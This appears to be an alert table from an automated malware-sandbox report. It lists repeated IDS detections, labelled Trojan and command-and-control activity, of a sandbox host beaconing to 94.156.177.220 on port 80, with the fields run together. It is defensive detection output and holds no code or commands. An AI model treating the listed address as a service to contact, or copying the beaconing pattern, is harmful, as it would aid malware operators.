          2024-10-30T08:06:22.977776+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249238TCP
          2024-10-30T08:06:24.242146+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249239TCP
          2024-10-30T08:06:25.361171+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249240TCP
          2024-10-30T08:06:26.468596+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249241TCP
          2024-10-30T08:06:27.665826+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249242TCP
          2024-10-30T08:06:28.770092+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249243TCP
          2024-10-30T08:06:29.917780+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249244TCP
          2024-10-30T08:06:31.116652+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249245TCP
          2024-10-30T08:06:32.222238+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249246TCP
          2024-10-30T08:06:33.727294+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249247TCP
          2024-10-30T08:06:34.827744+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249248TCP
          2024-10-30T08:06:35.938049+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249249TCP
          2024-10-30T08:06:37.069119+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249250TCP
          2024-10-30T08:06:38.213889+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249251TCP
          2024-10-30T08:06:39.481536+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249252TCP
          2024-10-30T08:06:40.599804+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249253TCP
          2024-10-30T08:06:41.732133+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249254TCP
          2024-10-30T08:06:43.082336+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249255TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:05:09.805259+010020243131Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
          2024-10-30T08:05:11.866370+010020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
          2024-10-30T08:05:13.066042+010020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
          2024-10-30T08:05:14.530693+010020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
          2024-10-30T08:05:15.724084+010020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
          2024-10-30T08:05:16.903233+010020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
          2024-10-30T08:05:18.116518+010020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
          2024-10-30T08:05:20.257432+010020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
          2024-10-30T08:05:21.414268+010020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
          2024-10-30T08:05:22.547976+010020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
          2024-10-30T08:05:23.878561+010020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
          2024-10-30T08:05:25.013347+010020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
          2024-10-30T08:05:26.165009+010020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
          2024-10-30T08:05:27.298933+010020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
          2024-10-30T08:05:28.420361+010020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
          2024-10-30T08:05:29.712490+010020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
          2024-10-30T08:05:31.143830+010020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
          2024-10-30T08:05:32.248948+010020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
          2024-10-30T08:05:34.425498+010020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
          2024-10-30T08:05:35.531260+010020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
          2024-10-30T08:05:37.315009+010020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
          2024-10-30T08:05:38.434976+010020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
          2024-10-30T08:05:39.810509+010020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
          2024-10-30T08:05:40.938395+010020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
          2024-10-30T08:05:42.048027+010020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
          2024-10-30T08:05:43.173890+010020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
          2024-10-30T08:05:44.297754+010020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
          2024-10-30T08:05:45.415337+010020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
          2024-10-30T08:05:46.562028+010020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
          2024-10-30T08:05:47.701361+010020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
          2024-10-30T08:05:48.832495+010020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
          2024-10-30T08:05:49.963141+010020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
          2024-10-30T08:05:51.172907+010020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
          2024-10-30T08:05:52.700629+010020243131Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
          2024-10-30T08:05:53.978000+010020243131Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
          2024-10-30T08:05:55.352695+010020243131Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
          2024-10-30T08:05:56.467964+010020243131Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
          2024-10-30T08:05:57.838085+010020243131Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
          2024-10-30T08:05:58.928078+010020243131Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
          2024-10-30T08:06:00.104218+010020243131Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
          2024-10-30T08:06:01.209529+010020243131Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
          2024-10-30T08:06:02.330873+010020243131Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
          2024-10-30T08:06:04.389809+010020243131Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
          2024-10-30T08:06:06.748732+010020243131Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
          2024-10-30T08:06:07.856913+010020243131Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
          2024-10-30T08:06:08.974240+010020243131Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
          2024-10-30T08:06:10.183336+010020243131Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
          2024-10-30T08:06:11.276041+010020243131Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
          2024-10-30T08:06:12.473968+010020243131Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
          2024-10-30T08:06:13.656125+010020243131Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
          2024-10-30T08:06:14.768078+010020243131Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
          2024-10-30T08:06:16.116463+010020243131Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
          2024-10-30T08:06:17.236013+010020243131Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
          2024-10-30T08:06:18.418046+010020243131Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
          2024-10-30T08:06:19.512629+010020243131Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
          2024-10-30T08:06:20.615050+010020243131Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
          2024-10-30T08:06:21.859001+010020243131Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
          2024-10-30T08:06:22.972081+010020243131Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
          2024-10-30T08:06:24.236352+010020243131Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
          2024-10-30T08:06:25.355048+010020243131Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
          2024-10-30T08:06:26.462640+010020243131Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
          2024-10-30T08:06:27.660015+010020243131Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
          2024-10-30T08:06:28.764256+010020243131Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
          2024-10-30T08:06:29.911064+010020243131Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
          2024-10-30T08:06:31.110868+010020243131Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
          2024-10-30T08:06:32.216549+010020243131Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
          2024-10-30T08:06:33.721560+010020243131Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
          2024-10-30T08:06:34.821084+010020243131Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
          2024-10-30T08:06:35.932227+010020243131Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
          2024-10-30T08:06:37.063345+010020243131Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
          2024-10-30T08:06:38.208116+010020243131Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
          2024-10-30T08:06:39.475766+010020243131Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
          2024-10-30T08:06:40.593259+010020243131Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
          2024-10-30T08:06:41.725469+010020243131Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
          2024-10-30T08:06:43.076970+010020243131Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
          2024-10-30T08:06:44.388294+010020243131Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:05:09.805259+010020243181Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
          2024-10-30T08:05:11.866370+010020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
          2024-10-30T08:05:13.066042+010020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
          2024-10-30T08:05:14.530693+010020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
          2024-10-30T08:05:15.724084+010020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
          2024-10-30T08:05:16.903233+010020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
          2024-10-30T08:05:18.116518+010020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
          2024-10-30T08:05:20.257432+010020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
          2024-10-30T08:05:21.414268+010020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
          2024-10-30T08:05:22.547976+010020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
          2024-10-30T08:05:23.878561+010020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
          2024-10-30T08:05:25.013347+010020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
          2024-10-30T08:05:26.165009+010020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
          2024-10-30T08:05:27.298933+010020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
          2024-10-30T08:05:28.420361+010020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
          2024-10-30T08:05:29.712490+010020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
          2024-10-30T08:05:31.143830+010020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
          2024-10-30T08:05:32.248948+010020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
          2024-10-30T08:05:34.425498+010020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
          2024-10-30T08:05:35.531260+010020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
          2024-10-30T08:05:37.315009+010020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
          2024-10-30T08:05:38.434976+010020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
          2024-10-30T08:05:39.810509+010020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
          2024-10-30T08:05:40.938395+010020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
          2024-10-30T08:05:42.048027+010020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
          2024-10-30T08:05:43.173890+010020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
          2024-10-30T08:05:44.297754+010020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
          2024-10-30T08:05:45.415337+010020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
          2024-10-30T08:05:46.562028+010020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
          2024-10-30T08:05:47.701361+010020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
          2024-10-30T08:05:48.832495+010020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
          2024-10-30T08:05:49.963141+010020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
          2024-10-30T08:05:51.172907+010020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
          2024-10-30T08:05:52.700629+010020243181Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
          2024-10-30T08:05:53.978000+010020243181Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
          2024-10-30T08:05:55.352695+010020243181Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
          2024-10-30T08:05:56.467964+010020243181Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
          2024-10-30T08:05:57.838085+010020243181Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
          2024-10-30T08:05:58.928078+010020243181Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
          2024-10-30T08:06:00.104218+010020243181Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
          2024-10-30T08:06:01.209529+010020243181Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
          2024-10-30T08:06:02.330873+010020243181Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
          2024-10-30T08:06:04.389809+010020243181Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
          2024-10-30T08:06:06.748732+010020243181Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
          2024-10-30T08:06:07.856913+010020243181Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
          2024-10-30T08:06:08.974240+010020243181Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
          2024-10-30T08:06:10.183336+010020243181Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
          2024-10-30T08:06:11.276041+010020243181Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
          2024-10-30T08:06:12.473968+010020243181Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
          2024-10-30T08:06:13.656125+010020243181Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
          2024-10-30T08:06:14.768078+010020243181Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
          2024-10-30T08:06:16.116463+010020243181Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
          2024-10-30T08:06:17.236013+010020243181Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
          2024-10-30T08:06:18.418046+010020243181Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
          2024-10-30T08:06:19.512629+010020243181Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
          2024-10-30T08:06:20.615050+010020243181Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
          2024-10-30T08:06:21.859001+010020243181Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
          2024-10-30T08:06:22.972081+010020243181Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
          2024-10-30T08:06:24.236352+010020243181Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
          2024-10-30T08:06:25.355048+010020243181Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
          2024-10-30T08:06:26.462640+010020243181Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
          2024-10-30T08:06:27.660015+010020243181Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
          2024-10-30T08:06:28.764256+010020243181Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
          2024-10-30T08:06:29.911064+010020243181Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
          2024-10-30T08:06:31.110868+010020243181Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
          2024-10-30T08:06:32.216549+010020243181Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
          2024-10-30T08:06:33.721560+010020243181Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
          2024-10-30T08:06:34.821084+010020243181Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
          2024-10-30T08:06:35.932227+010020243181Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
          2024-10-30T08:06:37.063345+010020243181Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
          2024-10-30T08:06:38.208116+010020243181Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
          2024-10-30T08:06:39.475766+010020243181Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
          2024-10-30T08:06:40.593259+010020243181Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
          2024-10-30T08:06:41.725469+010020243181Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
          2024-10-30T08:06:43.076970+010020243181Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
          2024-10-30T08:06:44.388294+010020243181Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:05:06.459100+010020216411A Network Trojan was detected192.168.2.224917894.156.177.22080TCP
          2024-10-30T08:05:07.647492+010020216411A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
          2024-10-30T08:05:08.819302+010020216411A Network Trojan was detected192.168.2.224918094.156.177.22080TCP
          2024-10-30T08:05:10.915321+010020216411A Network Trojan was detected192.168.2.224918194.156.177.22080TCP
          2024-10-30T08:05:12.060057+010020216411A Network Trojan was detected192.168.2.224918294.156.177.22080TCP
          2024-10-30T08:05:13.566514+010020216411A Network Trojan was detected192.168.2.224918394.156.177.22080TCP
          2024-10-30T08:05:14.723916+010020216411A Network Trojan was detected192.168.2.224918494.156.177.22080TCP
          2024-10-30T08:05:15.942458+010020216411A Network Trojan was detected192.168.2.224918594.156.177.22080TCP
          2024-10-30T08:05:17.133399+010020216411A Network Trojan was detected192.168.2.224918694.156.177.22080TCP
          2024-10-30T08:05:19.277982+010020216411A Network Trojan was detected192.168.2.224918794.156.177.22080TCP
          2024-10-30T08:05:20.440589+010020216411A Network Trojan was detected192.168.2.224918994.156.177.22080TCP
          2024-10-30T08:05:21.588925+010020216411A Network Trojan was detected192.168.2.224919094.156.177.22080TCP
          2024-10-30T08:05:22.901001+010020216411A Network Trojan was detected192.168.2.224919194.156.177.22080TCP
          2024-10-30T08:05:24.031737+010020216411A Network Trojan was detected192.168.2.224919294.156.177.22080TCP
          2024-10-30T08:05:25.168138+010020216411A Network Trojan was detected192.168.2.224919394.156.177.22080TCP
          2024-10-30T08:05:26.316456+010020216411A Network Trojan was detected192.168.2.224919494.156.177.22080TCP
          2024-10-30T08:05:27.446562+010020216411A Network Trojan was detected192.168.2.224919594.156.177.22080TCP
          2024-10-30T08:05:28.769767+010020216411A Network Trojan was detected192.168.2.224919694.156.177.22080TCP
          2024-10-30T08:05:30.189639+010020216411A Network Trojan was detected192.168.2.224919794.156.177.22080TCP
          2024-10-30T08:05:31.291768+010020216411A Network Trojan was detected192.168.2.224919894.156.177.22080TCP
          2024-10-30T08:05:33.448528+010020216411A Network Trojan was detected192.168.2.224919994.156.177.22080TCP
          2024-10-30T08:05:34.573615+010020216411A Network Trojan was detected192.168.2.224920094.156.177.22080TCP
          2024-10-30T08:05:36.354024+010020216411A Network Trojan was detected192.168.2.224920194.156.177.22080TCP
          2024-10-30T08:05:37.472418+010020216411A Network Trojan was detected192.168.2.224920294.156.177.22080TCP
          2024-10-30T08:05:38.850079+010020216411A Network Trojan was detected192.168.2.224920394.156.177.22080TCP
          2024-10-30T08:05:39.974781+010020216411A Network Trojan was detected192.168.2.224920494.156.177.22080TCP
          2024-10-30T08:05:41.093295+010020216411A Network Trojan was detected192.168.2.224920594.156.177.22080TCP
          2024-10-30T08:05:42.223444+010020216411A Network Trojan was detected192.168.2.224920694.156.177.22080TCP
          2024-10-30T08:05:43.323474+010020216411A Network Trojan was detected192.168.2.224920794.156.177.22080TCP
          2024-10-30T08:05:44.443649+010020216411A Network Trojan was detected192.168.2.224920894.156.177.22080TCP
          2024-10-30T08:05:45.594078+010020216411A Network Trojan was detected192.168.2.224920994.156.177.22080TCP
          2024-10-30T08:05:46.719816+010020216411A Network Trojan was detected192.168.2.224921094.156.177.22080TCP
          2024-10-30T08:05:47.844722+010020216411A Network Trojan was detected192.168.2.224921194.156.177.22080TCP
          2024-10-30T08:05:48.994924+010020216411A Network Trojan was detected192.168.2.224921294.156.177.22080TCP
          2024-10-30T08:05:50.136564+010020216411A Network Trojan was detected192.168.2.224921394.156.177.22080TCP
          2024-10-30T08:05:51.723367+010020216411A Network Trojan was detected192.168.2.224921494.156.177.22080TCP
          2024-10-30T08:05:53.016944+010020216411A Network Trojan was detected192.168.2.224921594.156.177.22080TCP
          2024-10-30T08:05:54.388350+010020216411A Network Trojan was detected192.168.2.224921694.156.177.22080TCP
          2024-10-30T08:05:55.506350+010020216411A Network Trojan was detected192.168.2.224921794.156.177.22080TCP
          2024-10-30T08:05:56.882882+010020216411A Network Trojan was detected192.168.2.224921894.156.177.22080TCP
          2024-10-30T08:05:58.006444+010020216411A Network Trojan was detected192.168.2.224921994.156.177.22080TCP
          2024-10-30T08:05:59.129063+010020216411A Network Trojan was detected192.168.2.224922094.156.177.22080TCP
          2024-10-30T08:06:00.249790+010020216411A Network Trojan was detected192.168.2.224922194.156.177.22080TCP
          2024-10-30T08:06:01.359866+010020216411A Network Trojan was detected192.168.2.224922294.156.177.22080TCP
          2024-10-30T08:06:03.427994+010020216411A Network Trojan was detected192.168.2.224922394.156.177.22080TCP
          2024-10-30T08:06:05.794636+010020216411A Network Trojan was detected192.168.2.224922494.156.177.22080TCP
          2024-10-30T08:06:06.906331+010020216411A Network Trojan was detected192.168.2.224922594.156.177.22080TCP
          2024-10-30T08:06:08.007595+010020216411A Network Trojan was detected192.168.2.224922694.156.177.22080TCP
          2024-10-30T08:06:09.216752+010020216411A Network Trojan was detected192.168.2.224922794.156.177.22080TCP
          2024-10-30T08:06:10.329968+010020216411A Network Trojan was detected192.168.2.224922894.156.177.22080TCP
          2024-10-30T08:06:11.503152+010020216411A Network Trojan was detected192.168.2.224922994.156.177.22080TCP
          2024-10-30T08:06:12.668267+010020216411A Network Trojan was detected192.168.2.224923094.156.177.22080TCP
          2024-10-30T08:06:13.809588+010020216411A Network Trojan was detected192.168.2.224923194.156.177.22080TCP
          2024-10-30T08:06:15.137055+010020216411A Network Trojan was detected192.168.2.224923294.156.177.22080TCP
          2024-10-30T08:06:16.279985+010020216411A Network Trojan was detected192.168.2.224923394.156.177.22080TCP
          2024-10-30T08:06:17.447186+010020216411A Network Trojan was detected192.168.2.224923494.156.177.22080TCP
          2024-10-30T08:06:18.565337+010020216411A Network Trojan was detected192.168.2.224923594.156.177.22080TCP
          2024-10-30T08:06:19.664244+010020216411A Network Trojan was detected192.168.2.224923694.156.177.22080TCP
          2024-10-30T08:06:20.905171+010020216411A Network Trojan was detected192.168.2.224923794.156.177.22080TCP
          2024-10-30T08:06:22.010824+010020216411A Network Trojan was detected192.168.2.224923894.156.177.22080TCP
          2024-10-30T08:06:23.254521+010020216411A Network Trojan was detected192.168.2.224923994.156.177.22080TCP
          2024-10-30T08:06:24.383881+010020216411A Network Trojan was detected192.168.2.224924094.156.177.22080TCP
          2024-10-30T08:06:25.510440+010020216411A Network Trojan was detected192.168.2.224924194.156.177.22080TCP
          2024-10-30T08:06:26.683858+010020216411A Network Trojan was detected192.168.2.224924294.156.177.22080TCP
          2024-10-30T08:06:27.814008+010020216411A Network Trojan was detected192.168.2.224924394.156.177.22080TCP
          2024-10-30T08:06:28.949969+010020216411A Network Trojan was detected192.168.2.224924494.156.177.22080TCP
          2024-10-30T08:06:30.169831+010020216411A Network Trojan was detected192.168.2.224924594.156.177.22080TCP
          2024-10-30T08:06:31.261182+010020216411A Network Trojan was detected192.168.2.224924694.156.177.22080TCP
          2024-10-30T08:06:32.735329+010020216411A Network Trojan was detected192.168.2.224924794.156.177.22080TCP
          2024-10-30T08:06:33.866597+010020216411A Network Trojan was detected192.168.2.224924894.156.177.22080TCP
          2024-10-30T08:06:34.981551+010020216411A Network Trojan was detected192.168.2.224924994.156.177.22080TCP
          2024-10-30T08:06:36.091784+010020216411A Network Trojan was detected192.168.2.224925094.156.177.22080TCP
          2024-10-30T08:06:37.229832+010020216411A Network Trojan was detected192.168.2.224925194.156.177.22080TCP
          2024-10-30T08:06:38.518588+010020216411A Network Trojan was detected192.168.2.224925294.156.177.22080TCP
          2024-10-30T08:06:39.633526+010020216411A Network Trojan was detected192.168.2.224925394.156.177.22080TCP
          2024-10-30T08:06:40.751576+010020216411A Network Trojan was detected192.168.2.224925494.156.177.22080TCP
          2024-10-30T08:06:41.872360+010020216411A Network Trojan was detected192.168.2.224925594.156.177.22080TCP
          2024-10-30T08:06:43.230803+010020216411A Network Trojan was detected192.168.2.224925694.156.177.22080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:04:49.058822+010020490381A Network Trojan was detected172.217.16.193443192.168.2.2249169TCP
          2024-10-30T08:05:05.900275+010020490381A Network Trojan was detected172.217.16.193443192.168.2.2249176TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:05:06.459100+010028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
          2024-10-30T08:05:07.647492+010028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
          2024-10-30T08:05:08.819302+010028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
          2024-10-30T08:05:10.915321+010028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
          2024-10-30T08:05:12.060057+010028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
          2024-10-30T08:05:13.566514+010028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
          2024-10-30T08:05:14.723916+010028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
          2024-10-30T08:05:15.942458+010028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
          2024-10-30T08:05:17.133399+010028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
          2024-10-30T08:05:19.277982+010028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
          2024-10-30T08:05:20.440589+010028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
          2024-10-30T08:05:21.588925+010028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
          2024-10-30T08:05:22.901001+010028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
          2024-10-30T08:05:24.031737+010028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
          2024-10-30T08:05:25.168138+010028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
          2024-10-30T08:05:26.316456+010028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
          2024-10-30T08:05:27.446562+010028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
          2024-10-30T08:05:28.769767+010028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
          2024-10-30T08:05:30.189639+010028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
          2024-10-30T08:05:31.291768+010028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
          2024-10-30T08:05:33.448528+010028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
          2024-10-30T08:05:34.573615+010028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
          2024-10-30T08:05:36.354024+010028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
          2024-10-30T08:05:37.472418+010028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
          2024-10-30T08:05:38.850079+010028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
